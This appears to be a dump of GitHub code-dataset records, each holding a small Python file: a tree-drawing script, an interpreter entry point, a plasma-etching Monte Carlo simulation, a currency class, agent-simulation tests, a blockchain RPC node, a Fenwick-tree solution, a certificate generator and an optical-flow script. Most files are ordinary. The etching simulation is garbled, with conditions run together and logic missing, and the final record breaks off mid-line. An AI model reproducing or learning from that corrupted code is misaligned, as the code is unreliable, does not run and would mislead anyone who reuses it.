y0)\n\t\telse:\n\t\t\tctx.arc_negative(x+deltaX+cornerRadius, y0-cornerRadius, cornerRadius, pi, pi/2.)\n\t\t\tctx.line_to(x+3*deltaX, y0)\n\t\tctx.stroke()\n\t\ty = drawtree(ctx, x+4*deltaX, y, v)\n\treturn y\n\n# Setup Cairo\n#surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, WIDTH, HEIGHT)\nsurface = cairo.PDFSurface(argv[2], WIDTH, HEIGHT)\nctx = cairo.Context(surface)\nctx.scale(scale, scale)\nctx.set_font_size(fontSize)\n\ndata = loaddata(argv[1])\n\ndrawtree(ctx, 10, 10+fontSize, data)\n\n#surface.write_to_png(\"tree.png\")\n","repo_name":"difx/difx","sub_path":"doc/userguide/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"32092904200","text":"import sys\n\nfrom interpreter.environment.environment import Environment\nfrom interpreter.lexer.lexer import Lexer\nfrom interpreter.parser.parser import Parser\nfrom interpreter.source.source import Source\n\n\nclass Interpreter:\n def __init__(self, source: Source):\n lexer = Lexer(source)\n parser = Parser(lexer)\n self.environment = Environment(parser.parse_program())\n self.result = self.environment.run_main()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n with open(sys.argv[1], 'r') as file:\n source = Source(file)\n interpreter = Interpreter(source)\n print(str(interpreter.result))\n","repo_name":"jfpio/TKOM-Interpreter","sub_path":"interpreter/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29497153728","text":"#\n# Etching of a solid\n# Examples for plasma pyhsics lectures\n# Achim von Keudell\n# Ruhr University Bochum, 2022\n#\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n# ----------------------------------------------------------------------------\n# Monte Carlo Simulation etching \n# ----------------------------------------------------------------------------\n#model = 'directional'\nmodel = 'isotrop'\n\nif model == 'directional':\n cosexponent = 20\n animationfile = 'etchdirectional.gif'\nif model == 'isotrop':\n cosexponent = 1\n animationfile = 'etchisotrop.gif'\n\nlimitcf = 2\nchemetch = 0.5\ndt = 0.1\n\nNBParticles = 5e4\nNBParticlesReplot = 1e2\nNBBinsX = 200\nNBBinsY = 200\nms = 1 # markersize\n\n# ---------------------------------------------------------------\n# Setup structure\n# ---------------------------------------------------------------\nx = np.zeros(NBBinsX)\ny = np.zeros(NBBinsX)\nbins = np.zeros([NBBinsX,NBBinsY])\n\n# material\nytop = int(0.75*NBBinsY)\nfor i in range(NBBinsX):\n for j in range(ytop):\n bins[i,j] = 1\n\n# mask\nylayer = ytop + 5\nfor i in range(NBBinsX):\n for j in range(ytop,ylayer):\n bins[i,j] = 2\n\n# large trench\nxwidth = 50\nxgaplarge = 0.7*NBBinsX\nxgap = int(xgaplarge-xwidth/2)\nfor i in range(xgap,xgap+xwidth):\n for j in range(ytop,ylayer):\n bins[i,j] = 1\n\n# small trench\nxwidth = 20\nxgapsmall = 0.3*NBBinsX\nxgap = int(xgapsmall-xwidth/2)\nfor i in range(xgap,xgap+xwidth):\n for j in range(ytop,ylayer):\n bins[i,j] = 1\n\n# ---------------------------------------------------------------\n# Count surrounding CF species\n# --------------------------------------------------------------- \ndef surrounding(i,j):\n pt = 0\n if i>1 and i1 and j1 and i1 and j0:\n t += dt\n xp += vx*dt + 1/2*dt**2*a # new position \n yp += vy*dt + 1/2*dt**2*a # new position \n \n if xp<0:\n xp = NBBinsX+xp\n if xp>NBBinsX:\n xp = xp-NBBinsX\n xi = int(np.trunc(xp)) # x index bin\n yi = int(np.trunc(yp)) # y index bin\n if xi>=0 and xi=0 and yi0:\n t += dt\n xp += vx*dt + 1/2*dt**2*a # new position \n yp += vy*dt + 1/2*dt**2*a # new position \n \n if xp<0:\n xp = NBBinsX+xp\n if xp>NBBinsX:\n xp = xp-NBBinsX\n xi = int(np.trunc(xp)) # x index bin\n yi = int(np.trunc(yp)) # y index bin\n if xi>=1 and xi=0 and yiNBBinsX-1: xi = xi-(NBBinsX-1) \n if yi<0: yi = NBBinsY+yi\n if yi>NBBinsX-1: yi = yi-(NBBinsY-1) \n # add radical only if place empty and maximal 2 on mask\n if bins[xi,yi] == 0 and yi 1 else \"\"}'\n\n def __int__(self):\n return self.amount\n\n def __repr__(self):\n return self.__str__()\n\n def __add__(self, other):\n if isinstance(other, Currency):\n if other.currency != self.currency:\n raise Exception(f'Cannot add between Currency type {self.currency} and {other.currency}')\n self.amount += other.amount\n elif isinstance(other, int):\n self.amount += other\n\n def __iadd__(self, other):\n if isinstance(other, Currency):\n if other.currency != self.currency:\n raise Exception(f'Cannot add between Currency type {self.currency} and {other.currency}')\n self.amount += other.amount\n elif isinstance(other, int):\n self.amount += other\n return self\n\n\nc1 = Currency('dollar', 5)\nc2 = Currency('dollar', 10)\nc3 = Currency('shekel', 1)\nc4 = Currency('shekel', 10)\n\nprint(str(c1))\nprint(str(c3))\n\nprint(int(c1))\nprint(repr(c1))\nc1 + 5\nprint(c1)\nc1 + c2\nprint(c1)\nc1 += 5\nprint(c1)\nc1 += c2\nprint(c1)\nc1 + c3\n\n\n\n","repo_name":"ilmar521/Bootcamp-Python","sub_path":"Week-9/Day-2/ExerciseXP/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"44371229120","text":"#!/usr/bin/python3\nimport re\n\npattern = re.compile(r'(\\d+)-(\\w+)')\nproducts = r\"1-a\\n20-baer\\n34-afcr\"\n\nmatch = pattern.finditer(products)\nfor country in match:\n print (\"Country : \" , country.group(1), \" Code: \", country.group(2))\n\n","repo_name":"alortimor/python_tricks","sub_path":"regular_expressions/country_from_product_code.py","file_name":"country_from_product_code.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"20945401682","text":"from math import exp\nimport igraph as ig\nfrom agent import Agent\n\n\nclass TestAgent:\n def test_init(self):\n a = Agent(id=1, n_beh=100, baserates=None)\n assert (0 < sum(a.beh)) and (sum(a.beh) < 100)\n\n assert isinstance(a, Agent)\n assert hasattr(a, \"id\")\n assert hasattr(a, \"name\")\n assert hasattr(a, \"beh\")\n assert hasattr(a, \"attempts\")\n\n assert a.name == \"id_1\"\n assert a.attempts == 0\n assert isinstance(a.id, int)\n assert isinstance(a.beh, list)\n assert a.current_emulations == 0\n assert a.current_emulated_risk_factors == 0\n\n b = Agent(id=2, n_beh=3, baserates=[0, 0, 0])\n assert sum(b.beh) == 0\n\n c = Agent(id=3, n_beh=3, baserates=[1, 1, 1])\n assert sum(c.beh) == 3\n\n d = Agent(id=4, n_beh=100, baserates=[0.25] * 100)\n assert (0 < sum(d.beh)) and (sum(d.beh) < 50)\n\n def test_emulate(self):\n a = Agent(id=1, n_beh=3)\n a.beh = [0, 0, 0]\n\n b = Agent(id=2, n_beh=3)\n b.beh = [1, 1, 1]\n\n c = Agent(id=3, n_beh=3)\n c.beh = [0, 1, 0]\n\n assert a.beh == [0, 0, 0]\n\n a.emulate(b, p=0)\n assert a.beh == [0, 0, 0]\n\n a.emulate(b, p=1)\n assert a.beh == [1, 1, 1]\n\n a.emulate(c, p=1)\n assert a.beh == [0, 1, 0]\n\n def test_emulate_alters(self):\n a = Agent(id=1, n_beh=3)\n a.beh = [0, 0, 0]\n assert a.emulatable_alters == 0\n\n b = Agent(id=2, n_beh=3)\n b.beh = [1, 1, 1]\n\n c = Agent(id=3, n_beh=3)\n c.beh = [2, 2, 2] # normally impossible, but helps for testing\n\n d = Agent(id=4, n_beh=3)\n d.beh = [-1, -1, -1] # normally impossible, but helps for testing\n\n agents = [a, b, c, d]\n net = ig.Graph(edges=[(0, 1), (0, 2), (3, 4), (2, 4)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # no one should be emulated because p = 0\n a.emulate_alters(agents, net, p=0)\n assert a.beh == [0, 0, 0]\n assert a.current_emulations == 0\n assert a.current_emulated_risk_factors == 0\n assert a.emulatable_alters == 2\n\n # only b and c should be emulated given this network arrangement\n a.emulate_alters(agents, net, p=1)\n assert all([b in [1, 2] for b in a.beh])\n assert a.current_emulations == 3\n assert a.current_emulated_risk_factors >= 3\n assert a.emulatable_alters == 2\n\n def test_spontaneously_change(self):\n a = Agent(id=1, n_beh=3)\n a.beh = [0, 0, 0]\n assert a.current_spon_changes == 0\n assert a.current_spon_risk_factors == 0\n\n baserates = [1, 1, 1]\n a.spontaneously_change(baserates, susceptibility=1)\n assert a.beh == [1, 1, 1]\n assert a.current_spon_changes == 3\n assert a.current_spon_risk_factors == 3\n\n baserates = [0, 0, 0]\n a.spontaneously_change(baserates, susceptibility=1)\n assert a.beh == [0, 0, 0]\n assert a.current_spon_changes == 3\n assert a.current_spon_risk_factors == 0\n\n baserates = [0, 1, 0]\n a.spontaneously_change(baserates, susceptibility=1)\n assert a.beh == [0, 1, 0]\n assert a.current_spon_changes == 3\n assert a.current_spon_risk_factors == 1\n\n baserates = [1, 1, 1]\n a.spontaneously_change(baserates, susceptibility=0)\n assert a.beh == [0, 1, 0]\n assert a.current_spon_changes == 0\n assert a.current_spon_risk_factors == 0\n\n def test_network_index(self):\n a = Agent(id=1, n_beh=3)\n b = Agent(id=2, n_beh=3) # connected\n c = Agent(id=3, n_beh=3)\n agents = [a, b, c]\n\n net = ig.Graph(edges=[(0, 1), (0, 2), (1, 3), (1, 4)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n assert a.network_index(net) == 0\n assert b.network_index(net) == 1\n assert c.network_index(net) == 2\n\n # Now the vertext indices of this new network are different, so the\n # previous equivalence between the network and agent lists is unreliable.\n # The network_index() method should still work, despite this problem\n net2 = net.induced_subgraph(vertices=[1, 2])\n\n assert a.name not in net2.vs[\"name\"]\n assert net2.vs[0][\"name\"] == b.name\n assert net2.vs[1][\"name\"] == c.name\n assert b.network_index(net2) == 0\n assert c.network_index(net2) == 1\n\n def test_alters(self):\n\n # Intentionally complicated ids to ensure alters can be retrieved,\n # even when agent ids don't directly corrospond to network.vs indices\n a = Agent(id=1010, n_beh=3)\n b = Agent(id=232, n_beh=3) # connected\n c = Agent(id=35432, n_beh=3) # connected\n d = Agent(id=44124, n_beh=3) # not connected\n e = Agent(id=44, n_beh=3) # not connected\n agents = [a, b, c, d, e]\n\n net = ig.Graph(edges=[(0, 1), (0, 2), (1, 3), (1, 4), (4, 5)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # Shuffling agents so the are intentionally out of order with network.vs\n # vertex order\n agents = [c, b, a, e, d]\n print(net.vs[\"name\"])\n\n # should retrieve b and c, but not d and e\n alters = a.alters(agents=agents, network=net)\n assert alters\n assert isinstance(alters, list)\n assert len(alters) == 2\n assert b in alters\n assert c in alters\n assert d not in alters\n assert e not in alters\n\n # No valid alters, return empty list\n alters = a.alters(agents=[d, e], network=net)\n assert not alters\n assert isinstance(alters, list)\n\n # Not agents given, return empty list\n alters = a.alters(agents=[], network=net)\n assert isinstance(alters, list)\n assert not alters\n\n def test_recruit_alters(self):\n # Intentionally odd IDs, to ensure method works when orderly IDs cant\n # be relied on\n a = Agent(id=33, n_beh=3)\n a.beh = [1, 1, 1]\n assert a.recruited_alters == 0\n\n # 66% similar (should recruit when thresh = .50)\n b = Agent(id=101, n_beh=3)\n b.beh = [1, 1, 0]\n\n # only 33% similar (should not recruit, whem thresh = .50)\n c = Agent(id=123, n_beh=3)\n c.beh = [1, 0, 0]\n\n agents = [a, b, c]\n\n # desired connection between a and b is intentionally missing\n net = ig.Graph(edges=[(1, 2)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # Use vertex names, no edge attributes\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") not in edges # not connected yet\n assert (\"id_33\", \"id_123\") not in edges\n assert (\"id_101\", \"id_123\") in edges\n\n # with this sim_thresh, b should be recruited, but no one else\n a.recruit_alters(agents, net, sim_thresh=0.50)\n assert a.recruited_alters == 1\n\n # Use vertex names, no edge attributes\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") in edges # connected now\n assert (\"id_33\", \"id_123\") not in edges\n assert (\"id_101\", \"id_123\") in edges\n\n def test_prune_alters(self):\n # Intentionally odd IDs, to ensure method works when orderly IDs cant\n # be relied on\n a = Agent(id=33, n_beh=3)\n a.beh = [1, 1, 1]\n assert a.pruned_alters == 0\n\n # 66% similar (should NOT prune when thresh = .50)\n b = Agent(id=101, n_beh=3)\n b.beh = [1, 1, 0]\n\n # only 33% similar (should prune, whem thresh = .50)\n c = Agent(id=123, n_beh=3)\n c.beh = [1, 0, 0]\n\n agents = [a, b, c]\n # complete network\n net = ig.Graph(edges=[(0, 1), (0, 2), (1, 2)])\n net.vs[\"name\"] = [f\"id_{agent.id}\" for agent in agents]\n\n # Use vertex names, no edge attributes\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") in edges\n assert (\"id_33\", \"id_123\") in edges\n assert (\"id_101\", \"id_123\") in edges\n\n # with this sim_thresh b should be retained, but c should be pruned\n a.prune_alters(agents, net, sim_thresh=0.50)\n assert a.pruned_alters == 1\n\n edges = [(e.source_vertex[\"name\"], e.target_vertex[\"name\"]) for e in net.es]\n assert (\"id_33\", \"id_101\") in edges # should be retained\n assert (\"id_33\", \"id_123\") not in edges # should now be gone\n assert (\"id_101\", \"id_123\") in edges # should be totally unaffected\n\n def test_suicide_risk(self):\n\n a = Agent(id=1, n_beh=3, baserates=None)\n\n gen_sui_prev = 1 / 100\n beh_odds_ratios = [2, 3, 4]\n\n a.beh = [0, 0, 0]\n p = a.suicide_risk(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert round(p, 4) == round(gen_sui_prev, 4)\n\n a.beh = [1, 0, 0]\n p = a.suicide_risk(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n a_odds = p / (1 - p)\n general_odds = gen_sui_prev / (1 - gen_sui_prev)\n a_odds_ratio = a_odds / general_odds\n assert round(a_odds_ratio, 8) == 2 # with beh_odds_ratios = [2, 3, 4]\n\n a.beh = [1, 0, 1]\n p = a.suicide_risk(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n a_odds = p / (1 - p)\n general_odds = gen_sui_prev / (1 - gen_sui_prev)\n a_odds_ratio = a_odds / general_odds\n assert round(a_odds / general_odds, 10) == 8 # with beh_odds_ratios = [2, 3, 4]\n\n # When accounting for gen_ave_beh == 2\n a.beh = [1, 1, 0]\n p = a.suicide_risk(\n odds_ratios=[2, 2, 2], gen_sui_prev=gen_sui_prev, gen_ave_beh=2\n )\n assert round(p, 4) == gen_sui_prev\n\n # When accounting for gen_ave_beh == 1\n a.beh = [1, 1, 1]\n p = a.suicide_risk(\n odds_ratios=[2, 2, 2], gen_sui_prev=gen_sui_prev, gen_ave_beh=1\n )\n a_odds = p / (1 - p)\n general_odds = gen_sui_prev / (1 - gen_sui_prev)\n a_odds_ratio = a_odds / general_odds\n assert round(a_odds_ratio, 8) == 4\n\n def test_consider_suicide(self):\n a = Agent(id=1, n_beh=3, baserates=None)\n\n assert a.attempts == 0\n assert a.current_attempt == 0\n\n gen_sui_prev = 1 / 1000 # very low baserate\n beh_odds_ratios = [1000, 1000, 1000] # very high risk factors\n\n # No beh risk factors implies low attempt prob\n a.beh = [0, 0, 0]\n outcome = a.consider_suicide(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert outcome == 0\n assert a.attempts == 0\n assert a.current_attempt == 0\n\n # Attempts should happen when a has many beh risk factors\n a.beh = [1, 1, 1]\n outcome = a.consider_suicide(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert outcome == 1\n assert a.attempts == 1\n assert a.current_attempt == 1\n\n # Test for increment of attempts\n outcome = a.consider_suicide(\n odds_ratios=beh_odds_ratios, gen_sui_prev=gen_sui_prev, gen_ave_beh=0\n )\n assert outcome == 1\n assert a.attempts == 2\n assert a.current_attempt == 1\n","repo_name":"iancero/nhiabm_v2","sub_path":"simulation/tests/test_agent.py","file_name":"test_agent.py","file_ext":"py","file_size_in_byte":11517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39664511818","text":"from xmlrpc.server import SimpleXMLRPCServer\nfrom xmlrpc.client import ServerProxy\nfrom pymongo.errors import DuplicateKeyError\nfrom node import get_nodes, add_node\nfrom Database.mongoDB import MongoDB\nfrom lib.common import cprint\nfrom utils.crypto import Crypto\nfrom Wallet.p2pkh import P2pkh\n\nserver = None\n\nPORT = 8301\n\np = P2pkh()\nclass RpcServer():\n\n def __init__(self, server):\n self.server = server\n\n def ping(self):\n return True\n\n def get_blockchain(self) -> list:\n bclist = []\n bcdb = MongoDB()\n # Validation\n for x in bcdb.getAll('blockchain'):\n header_bin = str(x['index']) + str(x['timestamp']) + str(x['prevHash']) +\\\n str(x['difficulty']) + str(x['nonce']) + str(x['data']) + str(x['merkleroot'])\n if x['hash'] == Crypto().sha256(Crypto().sha256(header_bin)):\n bclist.append(x)\n MongoDB().close_connect()\n return bclist\n\n def new_block(self, block):\n # Validation\n header_bin = str(block['index']) + str(block['timestamp']) + str(block['prevHash']) + \\\n str(block['difficulty']) + str(block['nonce']) + str(block['data']) + str(block['merkleroot'])\n if block['hash'] != Crypto().sha256(Crypto().sha256(header_bin)):\n return False\n try:\n cprint('RPC', block)\n MongoDB().insertOne('blockchain', block)\n cprint('INFO', \"Receive new block.\")\n MongoDB().close_connect()\n return True\n except DuplicateKeyError:\n print('Existed block, skipped')\n return False\n\n\n\n def get_transactions(self) -> list:\n tdb = MongoDB()\n txs = []\n for x in tdb.getAll(\"transactions\"):\n txs.append(x)\n MongoDB().close_connect()\n return txs\n\n def new_untransaction(self, untx):\n cprint(__name__, untx)\n '''\n verify(self, utxoHash, pack, address) -> bool\n '''\n txid = untx['hash']\n unLockSig = []\n signature = []\n spublickey = []\n address = []\n # get signature and public key from utxo input\n for x in untx['vin']:\n unLockSig.append(x['unLockSig'])\n signature.append(x['unLockSig']['signature'])\n spublickey.append(x['unLockSig']['publickey'])\n for x in untx['vout']:\n address.append(x['lockSig']['senderAddress'])\n # Normal check\n # whether it has a signature\n if len(set(signature)) != 1:\n print('Signature is not correct')\n return False\n # whether it has a public key\n if len(set(spublickey)) != 1:\n print('Signature is not correct')\n return False\n # whether it has an address\n if len(set(address)) != 1:\n print('Signature is not correct')\n return False\n # use public key and transaction id to verify signature\n if not p.verify(txid, unLockSig[0], address[0]):\n print('Signature is not correct')\n return False\n print('Signature is correct')\n # try to store pending transactions, if they exist, then just skip\n try:\n MongoDB().insertOne('ptransactions', untx)\n except DuplicateKeyError:\n print('Existed pending transactions, skipped')\n cprint('INFO', \"Receive new unchecked transaction.\")\n MongoDB().close_connect()\n return True\n\n def blocked_transactions(self, txs):\n try:\n for x in txs:\n MongoDB().insertOne('transactions', x)\n cprint('INFO', \"Receive new blocked transactions.\")\n MongoDB().close_connect()\n return True\n except DuplicateKeyError:\n print('Existed transactions, skipped')\n return False\n\n\n def add_node(self, address):\n add_node(address)\n return True\n\n\nclass RpcClient():\n ALLOW_METHOD = ['get_transactions', 'get_blockchain', 'new_block', 'new_untransaction', 'blocked_transactions',\n 'ping', 'add_node']\n\n def __init__(self, node):\n self.node = node\n self.client = ServerProxy(node)\n\n def __getattr__(self, name):\n def noname(*args, **kw):\n if name in self.ALLOW_METHOD:\n return getattr(self.client, name)(*args, **kw)\n\n return noname\n\n\nclass BroadCast():\n # Calling all functions in RpcServer\n def __getattr__(self, name):\n def processes(*args, **kw):\n nodes = get_clients()\n result = []\n for x in nodes:\n try:\n result.append(getattr(x, name)(*args, **kw))\n print(result)\n except ConnectionRefusedError:\n cprint('WARNNING', 'Failed to connect %s when invoking %s ' % (x.node, name))\n else:\n cprint('INFOMATION', 'Connect to %s successful invoking %s .' % (x.node, name))\n return result\n return processes\n\n\ndef start_server(ip, port=8301):\n server = SimpleXMLRPCServer((ip, port))\n rpc = RpcServer(server)\n server.register_instance(rpc)\n server.serve_forever()\n\n\ndef get_clients():\n clients = []\n nodes = get_nodes()\n\n for node in nodes:\n clients.append(RpcClient(node))\n return clients","repo_name":"q27810365/Blockchain-Prototype","sub_path":"rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40976362891","text":"# https://leetcode.cn/problems/coin-bonus/\n# Using dfs order to record node and child node relationship\n\n\nM = int(1e9 + 7)\n\nclass BIT:\n def __init__(self, n):\n self.n = n + 5\n self.sum = [0 for _ in range(n + 10)]\n self.ntimessum = [0 for _ in range(n + 10)]\n \n def lowbit(self, x):\n return x & (-x)\n\n # 在 pos 位置加上 k\n def update(self, pos, k):\n x = pos\n while pos <= self.n:\n self.sum[pos] += k\n self.sum[pos] %= M\n self.ntimessum[pos] += k * (x - 1)\n self.ntimessum[pos] %= M\n pos += self.lowbit(pos)\n \n # 区间更新 + 单点查询\n def askis(self, pos):\n if not pos:\n return 0\n ret = 0\n while pos:\n ret += self.sum[pos]\n ret %= M\n pos -= lowbit(pos)\n return ret\n \n # 单点更新 + 区间查询\n def asksi(self, l, r):\n if l > r:\n return 0\n return askis(r) - askis(l - 1)\n \n # 单点更新 + 单点查询\n def askss(self, pos):\n return askis(pos) - askis(pos - 1)\n \n # 区间更新 + 区间查询\n def askii(self, pos):\n if not pos:\n return 0\n ret = 0\n x = pos\n while pos:\n ret += x * self.sum[pos] - self.ntimessum[pos]\n ret %= M\n pos -= self.lowbit(pos)\n return ret\n\nclass Solution:\n def bonus(self, n: int, leadership: List[List[int]], operations: List[List[int]]) -> List[int]:\n \n # 邻接表\n g = [[] for _ in range(n + 1)]\n begin = [0 for _ in range(n + 1)]\n end = [0 for _ in range(n + 1)]\n id = 1\n\n for l in leadership:\n g[l[0]].append(l[1])\n \n # 深搜\n def dfs(cur):\n nonlocal id\n begin[cur] = id\n for child in g[cur]:\n dfs(child)\n end[cur] = id\n id += 1\n dfs(1)\n \n # 树状数组\n b = BIT(n)\n ret = []\n for q in operations:\n if q[0] == 1:\n b.update(end[q[1]], q[2])\n b.update(end[q[1]] + 1, -q[2])\n elif q[0] == 2:\n b.update(begin[q[1]], q[2])\n b.update(end[q[1]] + 1, -q[2])\n else:\n ans = b.askii(end[q[1]]) - b.askii(begin[q[1]] - 1)\n ret.append((ans % M + M) % M)\n\n return ret\n\n# 作者:BNDSllx\n# 链接:https://leetcode.cn/problems/coin-bonus/solution/xiao-ai-lao-shi-li-kou-bei-li-jie-zhen-t-rut3/\n# 来源:力扣(LeetCode)\n# 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。","repo_name":"wherby/code","sub_path":"algorithm/dfs/dfsForTreeWithChild.py","file_name":"dfsForTreeWithChild.py","file_ext":"py","file_size_in_byte":2726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"22312572665","text":"from PIL import Image , ImageEnhance\nfrom PIL import ImageFont\nfrom PIL import ImageDraw \nimport openpyxl\n\n#Open workbook and sheet with data\ndoc = openpyxl.load_workbook (\"YOURFILE.xlsx\")\nsheet = doc.get_sheet_by_name(\"SHEET\")\n\n#Save data in list\nnames=[]\nlastnames=[]\nlevels= []\nfor row in sheet.iter_rows():\n name = row[0].value\n lastname = row[1].value\n level = row[2].value\n #Verify empty slots\n if name != None and lastname != None:\n names.append(name)\n lastnames.append(lastname)\n levels.append(level)\n\nc=0\n\nfor personName,personLastname in zip(names,lastnames):\n #Open image to set fullname to and create a copy to work with\n cert = Image.open(\"YOURFILETOADDDATA.png\")\n cert_copy = cert.copy()\n\n #font\n draw = ImageDraw.Draw(cert_copy)\n #font = ImageFont.truetype(, )\n font = ImageFont.truetype(\"OpenSans-Bold.ttf\", 90)\n font2 = ImageFont.truetype(\"OpenSans-Bold.ttf\", 60)\n #draw.text((x, y),\"Sample Text\",(r,g,b))\n fullname = personName+\" \"+personLastname\n day = \"1\"\n month = \"April\"\n year = \"21\"\n \n #Calculate position\n W, H = cert.size\n w, h = draw.textsize(fullname, font=font)\n \n #(W-w)/2 => to center in x, (H-h)/2 to center in y\n draw.text(((W-w)/2,405),fullname,(0,0,0),font=font ) \n draw.text((440,575),day,(0,0,0),font=font2 ) #day position \n draw.text((670,575),month,(0,0,0),font=font2 ) #month position\n draw.text((1090,575),year,(0,0,0),font=font2 ) #year position\n \n file = \"yourfilename\"+fullname\n \n #add a few enhance \n contrast = ImageEnhance.Contrast(cert_copy)\n contrast.enhance(5)\n color = ImageEnhance.Color(cert_copy)\n color.enhance(2).save(file+\".pdf\") #you can change the type of file\n \n cert_copy.save(file+\".pdf\")\n c=c+1\n\n","repo_name":"AboveZtars/namesoncertificate","sub_path":"Imgeditpil.py","file_name":"Imgeditpil.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"11181352611","text":"from scipy import signal\nimport numpy as np\nimport cv2\nfrom skimage import filters\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom pylab import *\nimport random\n\n# Pass in old and new frame (both gray) and x and y coordinate of point to optical flow on, odd single integer for window size\ndef my_optical_flow(old_frame,new_frame,row,col,window_size):\n # Written for 1 point not multiple\n\n # Optionally blur images for better estimation\n k = 3 # gauss kernel size\n image_1 = cv2.GaussianBlur(old_frame.copy(),(k,k),0)\n image_2 = cv2.GaussianBlur(new_frame.copy(),(k,k),0)\n\n row = int(np.rint(row))\n col = int(np.rint(col))\n\n # kernel_x = np.array([[-1., 1.], [-1., 1.]])\n # kernel_y = np.array([[-1., -1.], [1., 1.]])\n # kernel_t = np.array([[1., 1.], [1., 1.]])\n kernel_x = np.array([[-1., 1.], [-1., 1.]]) * 0.25\n kernel_y = np.array([[-1., -1.], [1., 1.]]) * 0.25\n kernel_t = np.array([[1., 1.], [1., 1.]]) * 0.25\n \n # Optionally normalize pixels\n # image_1 = image_1 / 255.\n # image_2 = image_2 / 255.\n\n # Calculate I_x, I_y, I_t\n mode = 'same'\n fx = signal.convolve2d(image_1, kernel_x, mode=mode)\n fy = signal.convolve2d(image_1, kernel_y, mode=mode)\n ft = np.add(\n signal.convolve2d(image_2, kernel_t, mode=mode),\n signal.convolve2d(image_1, (-1 * kernel_t), mode=mode)\n ) \n \n # window_size is odd, all the pixels with offset in between [-w, w] are inside the window\n w = int(window_size/2)\n\n # Finding values within window\n Ix = fx[row-w:row+w+1, col-w:col+w+1].flatten()\n Iy = fy[row-w:row+w+1, col-w:col+w+1].flatten()\n It = ft[row-w:row+w+1, col-w:col+w+1].flatten()\n\n A_T = np.array((Ix,Iy))\n A = np.transpose(A_T)\n b = np.expand_dims(np.array(It),axis=1)\n\n u,v = np.linalg.pinv(A_T @ A) @ (A_T @ b)\n\n # Use optical flow comps (u,v) to calc new points + returns 1x2 array\n return np.float32(np.array([[row+v,col+u]]))\n\n\ndef main():\n\n # CODE TO SHOW OPTICAL FLOW DIAGRAMS FOR 2 FRAMES\n w = 7 # Window size\n Image1 = Image.open('basketball1.png').convert('L')\n Image2 = Image.open('basketball2.png').convert('L')\n\n Image1 = np.array(Image1)\n Image2 = np.array(Image2)\n\n # finding the good features\n features = cv2.goodFeaturesToTrack(Image1,100,0.01,5)\t\n features = np.int0(features)\n\n c = \"r\" # color for plot\n\n plt.subplot(1,2,1) # Plot 1 for open cv implementation\n plt.title(\"Optical Flow Vectors (OpenCV)\")\n plt.imshow(Image1,cmap = cm.gray)\n\n # Parameters for lucas kanade optical flow\n lk_params = dict( winSize = (w,w), maxLevel = 0, criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n for f in features:\n # Compute flow\n feature = np.float32(np.expand_dims(f,axis=0))\n new_p, st, er = cv2.calcOpticalFlowPyrLK(Image1, Image2, feature, None, **lk_params)\n \n new_row, new_col = new_p.ravel()\n\n u = new_col - f[0,1] # dx, change in col\n v = new_row - f[0,0] # dy, change in row\n\n # Plot Arrow\n plt.arrow(f[0,0],f[0,1],u,v,head_width =5, head_length =5, color = c)\n\n plt.subplot(1,2,2) # Plot 2 for open cv implementation\n plt.title(\"Optical Flow Vectors (Our implementation)\")\n plt.imshow(Image1,cmap = cm.gray)\n\n for f in features: \n row = f[0,0]\n col = f[0,1]\n\n new_p = my_optical_flow(Image1,Image2,row,col,w)\n new_row, new_col = new_p.ravel()\n\n u = new_col - col # dx, change in col\n v = new_row - row # dy, change in row\n\n # Plot Arrow\n plt.arrow(row,col,u,v,head_width =5, head_length =5, color = c)\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()","repo_name":"paloomers/ammp","sub_path":"my_optical.py","file_name":"my_optical.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18248001497","text":"from collections import deque\nimport copy\nfrom queue import PriorityQueue\nimport sys\n\n# n = int(input())\n# size 